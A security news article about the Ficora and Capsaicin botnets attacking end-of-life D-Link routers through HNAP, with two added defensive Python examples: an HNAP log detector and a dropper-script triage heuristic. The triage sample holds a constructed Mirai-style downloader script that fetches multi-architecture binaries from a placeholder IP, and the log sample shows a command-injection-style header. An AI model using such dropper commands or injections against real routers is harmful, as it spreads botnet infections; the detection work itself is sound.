6 January 2025

Ficora and Capsaicin botnets target EoL D-Link routers


Two botnets, tracked as “Ficora” and “Capsaicin,” have been observed ramping up attacks on outdated and end-of-life D-Link routers, according to Fortinet’s researchers.

Among the targeted models are popular D-Link routers widely used by both individuals and organizations, including the DIR-645, DIR-806, GO-RT-AC750 and DIR-845L. For initial access, the attackers exploit known vulnerabilities such as CVE-2015-2051.

Once compromised, the botnets take advantage of flaws in D-Link’s management interface, specifically through the HNAP (Home Network Administration Protocol), to execute malicious commands via the GetDeviceSettings action.
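The HNAP abuse described above leaves a recognisable trace in request logs: a legitimate D-Link HNAP call is a POST to /HNAP1/ whose SOAPAction header is exactly one action URI of the form "http://purenetworks.com/HNAP1/<ActionName>", and it should only ever come from the LAN. The following detection script is an added example written for this article; it is not code from Fortinet, D-Link or the report. The tab-separated log format, the sample records, and the choice of RFC 1918 ranges as "LAN" are all assumptions made for the example.

```python
"""Flag anomalous HNAP management requests in a request log.

Added example, not code from the article or the Fortinet report. Assumed log
format (constructed for this example): one tab-separated record per request
with the fields  timestamp, source IP, method, path, status, SOAPAction header
value (empty string when the header was absent).
"""
import ipaddress
import re
from typing import List, NamedTuple

# A well-formed HNAP action header: one purenetworks URI with a plain action name.
HNAP_ACTION_RE = re.compile(r'^"?http://purenetworks\.com/HNAP1/([A-Za-z0-9]+)"?$')
# Characters that never belong in a SOAPAction value and raise severity when seen.
SHELL_META_RE = re.compile(r'[;`|&$(){}<>]')
# Assumption: the router's LAN side uses RFC 1918 space.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


class Finding(NamedTuple):
    ts: str
    src: str
    severity: str
    reason: str


def is_lan(ip: str) -> bool:
    """True if ip parses and falls inside one of the assumed LAN ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in LAN_NETS)


def analyse(lines: List[str]) -> List[Finding]:
    """Return one Finding per HNAP request that deviates from the expected shape."""
    findings: List[Finding] = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 6:
            continue  # not a record in the assumed format
        ts, src, method, path, _status, soapaction = parts
        if not path.startswith("/HNAP1"):
            continue  # only the management interface is of interest here
        if method == "GET" and soapaction == "":
            continue  # plain HNAP capability discovery invokes no action
        m = HNAP_ACTION_RE.match(soapaction)
        if m is None:
            sev = "high" if SHELL_META_RE.search(soapaction) else "medium"
            findings.append(Finding(ts, src, sev, f"malformed SOAPAction {soapaction!r}"))
            continue
        if not is_lan(src):
            findings.append(Finding(ts, src, "medium",
                                    f"HNAP {m.group(1)} call from non-LAN address"))
    return findings


# Constructed sample records: one clean LAN call, one discovery GET, one
# malformed header from outside, one well-formed call from outside, one non-HNAP hit.
SAMPLE_LOG = [
    "\t".join(["2024-11-02T10:15:01Z", "192.168.0.23", "POST", "/HNAP1/", "200",
               '"http://purenetworks.com/HNAP1/GetDeviceSettings"']),
    "\t".join(["2024-11-02T10:15:02Z", "192.168.0.23", "GET", "/HNAP1/", "200", ""]),
    "\t".join(["2024-11-02T10:15:07Z", "198.51.100.77", "POST", "/HNAP1/", "200",
               '"http://purenetworks.com/HNAP1/GetDeviceSettings/;PLACEHOLDER"']),
    "\t".join(["2024-11-02T10:15:09Z", "203.0.113.9", "POST", "/HNAP1/", "200",
               '"http://purenetworks.com/HNAP1/GetDeviceSettings"']),
    "\t".join(["2024-11-02T10:15:11Z", "203.0.113.9", "GET", "/index.html", "200", ""]),
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f.ts} {f.src} [{f.severity}] {f.reason}")
```

The exact-match rule on the SOAPAction value is deliberate: rather than enumerating bad inputs, it treats anything that is not a single well-formed action URI as suspect, and only uses the shell-metacharacter check to rank severity. On a real deployment the same logic belongs in front of the router (a reverse proxy or IDS), since an end-of-life device will not receive a firmware fix.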

Both botnets are capable of stealing data, executing shell scripts, and launching distributed denial-of-service (DDoS) attacks.

Ficora appears to be a new variant of the notorious Mirai botnet, optimized to exploit vulnerabilities specific to D-Link routers. Fortinet’s telemetry data shows that Ficora’s activity spreads across the globe, with a notable focus on Japan and the United States. Two activity surges were recorded in October and November 2024.

After gaining access, Ficora deploys a shell script named ‘multi,’ which downloads and executes its payload using multiple methods such as wget, curl, ftpget, and tftp. The malware also includes a brute-force component with hard-coded credentials, enabling it to spread to other Linux-based devices. Ficora’s DDoS capabilities include UDP flooding, TCP flooding, and DNS amplification.

Capsaicin, linked to the Keksec group known for malware such as EnemyBot, was first spotted in October 2024, targeting primarily East Asian countries. The botnet uses a downloader script (“bins.sh”) to fetch binaries with the prefix ‘yakuza’ for various architectures, including ARM, MIPS, SPARC, and x86.

Capsaicin is capable of disabling other botnet payloads active on the same device. In addition to DDoS capabilities similar to Ficora’s, Capsaicin can gather host information and exfiltrate it to its command-and-control (C2) server.
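Both the Ficora ‘multi’ script and the Capsaicin ‘bins.sh’ script described above follow the same Mirai-style pattern: try several fetch utilities, pull one binary per CPU architecture under a common name prefix, and stage everything in a world-writable directory. That pattern is something an incident responder can triage automatically when a script is recovered from a honeypot or a quarantined device. The heuristic below is an added example written for this article, not code from Fortinet or from either botnet; the sample script it runs on is constructed, with a documentation-range IP and no real URL, and the thresholds are assumptions.

```python
"""Heuristic triage of a recovered downloader shell script.

Added example, not from the article or the Fortinet report. Scores a script on
three signals that Mirai-style droppers share: multiple fetch utilities,
a family of binaries named <prefix>.<arch>, and staging in a writable directory.
Thresholds and token lists are assumptions chosen for this example.
"""
import re
from typing import Dict, List

FETCH_TOOLS = ("wget", "curl", "ftpget", "tftp")
ARCH_TOKENS = ("arm", "arm5", "arm6", "arm7", "mips", "mpsl", "mipsel", "sparc",
               "x86", "i586", "i686", "ppc", "sh4", "m68k")

# A fetch tool invoked at the start of a line or after a shell separator.
TOOL_RE = re.compile(r'(?:^|[\s;|&])(' + '|'.join(FETCH_TOOLS) + r')\b', re.MULTILINE)
# <prefix>.<arch>, <prefix>-<arch> or <prefix>_<arch>; longest tokens first so
# "arm7" is not cut down to "arm".
BIN_RE = re.compile(r'\b([A-Za-z0-9_]+)[.\-_]('
                    + '|'.join(sorted(ARCH_TOKENS, key=len, reverse=True)) + r')\b')
WRITABLE_DIR_RE = re.compile(r'\bcd\s+(/tmp|/var/run|/var/tmp|/dev/shm|/mnt)\b')
CHMOD_RE = re.compile(r'\bchmod\s+(?:\+x|[0-7]{3,4})\b')


def triage(script_text: str) -> Dict[str, object]:
    """Return the extracted signals plus a verdict for one script."""
    tools: List[str] = sorted({m.group(1) for m in TOOL_RE.finditer(script_text)})
    families: Dict[str, set] = {}
    for m in BIN_RE.finditer(script_text):
        families.setdefault(m.group(1), set()).add(m.group(2))
    # A "family" is one prefix fetched for at least three architectures.
    multi_arch = {p: sorted(a) for p, a in families.items() if len(a) >= 3}
    stages = bool(WRITABLE_DIR_RE.search(script_text))
    chmods = len(CHMOD_RE.findall(script_text))
    is_dropper = bool(multi_arch) and (len(tools) >= 2 or stages)
    return {
        "fetch_tools": tools,
        "multi_arch_families": multi_arch,
        "stages_in_writable_dir": stages,
        "chmod_count": chmods,
        "verdict": "multi-arch dropper" if is_dropper else "no dropper pattern",
    }


# Constructed sample in the shape the article describes (documentation-range
# address, placeholder prefix 'yakuza' taken from the article, no live payload).
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://203.0.113.10/bins/yakuza.arm -O yakuza.arm; chmod 777 yakuza.arm
wget http://203.0.113.10/bins/yakuza.mips -O yakuza.mips; chmod 777 yakuza.mips
curl -s http://203.0.113.10/bins/yakuza.sparc -o yakuza.sparc; chmod 777 yakuza.sparc
tftp -g -r yakuza.x86 203.0.113.10; chmod 777 yakuza.x86
ftpget -u anonymous -p anonymous 203.0.113.10 yakuza.mpsl yakuza.mpsl; chmod 777 yakuza.mpsl
"""

BENIGN_SCRIPT = """#!/bin/sh
apt-get update
wget https://example.com/notes.txt -O /opt/notes.txt
"""

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, triage(text))
```

The architecture-family signal is the one that separates a dropper from an ordinary provisioning script: legitimate installers fetch one binary for the host they run on, whereas a botnet script fetches every build it has and lets the device run whichever one matches. Requiring the family signal plus either multiple fetch tools or a writable-directory stage keeps a single `wget` of a file called `tool.arm` from tripping the rule.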
